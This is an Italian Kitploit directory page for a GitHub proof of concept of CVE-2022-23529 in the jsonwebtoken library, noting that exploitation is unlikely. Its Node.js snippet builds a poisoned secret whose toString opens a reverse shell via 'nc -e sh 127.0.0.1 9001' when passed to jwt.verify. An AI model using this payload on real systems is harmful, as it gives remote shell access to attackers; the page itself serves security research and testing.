Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-23529-Exploration — CVE-2022-23529-PoC | Kitploit
Strumenti/GitHubGitHub/daniel-marchi/cve-2022-23529-exploration
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingSviluppo Payload
GitHubdaniel-marchi/cve-2022-23529-exploration

CVE-2022-23529-Exploration

CVE-2022-23529-PoC

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
3 anni faNon ancora revisionato

CVE-2022-23529

Le versioni della libreria JSON Web Token (JWT) precedenti alla 3.4.6, alla 4.0.4 e alla 4.1.5 sono vulnerabili a RCE.

Le funzioni di hashing HMAC accettano qualsiasi stringa come input, il che porta a RCE.

A causa delle precondizioni, è improbabile che questa vulnerabilità sia sfruttabile.

Per sfruttare questa vulnerabilità, un attaccante dovrebbe soddisfare una delle seguenti condizioni:

  • Il server non memorizza le chiavi segrete in modo sicuro.
  • L'attaccante deve avere accesso alle chiavi segrete e controllarle.

npm install [email protected]

var jwt = require('jsonwebtoken');

crea un token usando il segreto del server

var token = jwt.sign({"x":"y"}, 'servers_secret');

crea un oggetto dannoso contenente una reverse shell (node.js)

root@kitploit:~
var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 127.0.0.1 9001');
        });
        process.exit(0)
    }
}

il server verifica il token utilizzando un oggetto dannoso memorizzato come segreto

jwt.verify(token, poisoned_secret_on_server);

Scarica lo strumento